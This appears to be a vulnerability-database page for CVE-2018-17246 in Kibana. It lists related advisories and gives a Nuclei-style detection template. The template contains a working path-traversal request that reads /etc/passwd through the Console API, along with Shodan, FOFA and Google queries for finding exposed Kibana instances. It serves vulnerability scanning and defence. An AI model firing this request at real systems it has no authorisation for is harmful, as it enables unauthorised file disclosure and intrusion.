| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Code Injection in Pivotal_Software Spring_Data_Commons | 11 Apr 2021 11:34 | – | gitee |
| CVE-2018-17246 | 12 Nov 2024 00:00 | – | circl |
| Elasticsearch Kibana Console Plugin Command Execution Vulnerability | 13 Nov 2018 00:00 | – | cnvd |
| CVE-2018-17246 | 20 Dec 2018 22:00 | – | cve |
| CVE-2018-17246 | 20 Dec 2018 22:00 | – | cvelist |
| Elastic Stack 6.4.3 and 5.6.13 security update | 6 Nov 2018 18:35 | – | elastic |
| Kibana ESA-2018-18 | 7 Nov 2018 00:00 | – | nessus |
| Photon OS 1.0: Kibana PHSA-2019-1.0-0209 | 28 Jan 2020 00:00 | – | nessus |
| Photon OS 2.0: Kibana PHSA-2019-2.0-0132 | 18 Mar 2019 00:00 | – | nessus |
| Photon OS 3.0: Kibana PHSA-2019-3.0-0002 | 22 Jul 2024 00:00 | – | nessus |
```yaml
id: CVE-2018-17246

info:
  name: Kibana - Local File Inclusion
  author: princechaddha,thelicato
  severity: critical
  description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further attacks.
  remediation: |
    Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
    - https://www.elastic.co/community/security
    - https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594
    - https://nvd.nist.gov/vuln/detail/CVE-2018-17246
    - https://access.redhat.com/errata/RHBA-2018:3743
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-17246
    cwe-id: CWE-829,CWE-73
    epss-score: 0.82251
    epss-percentile: 0.99614
    cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: elastic
    product: kibana
    shodan-query: http.title:"kibana"
    fofa-query: title="kibana"
    google-query: intitle:"kibana"
  tags: cve,cve2018,lfi,kibana,vulhub,elastic,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"message\":\"An internal server error occurred\""

      - type: word
        part: header
        words:
          - "kbn-name"
          - "kibana"
        case-insensitive: true
        condition: or

      - type: word
        part: header
        words:
          - "application/json"
# digest: 4a0a00473045022100baeb341e2ab36648629417ba58e6c56de55b6149f10765b6c685de841992b1fd02202a837ab85e2a1a384cbf00a980b7d471f3ba2983830d58c9b60e0788f87342a7:922c64590222798bb761d5b6d8e72950
```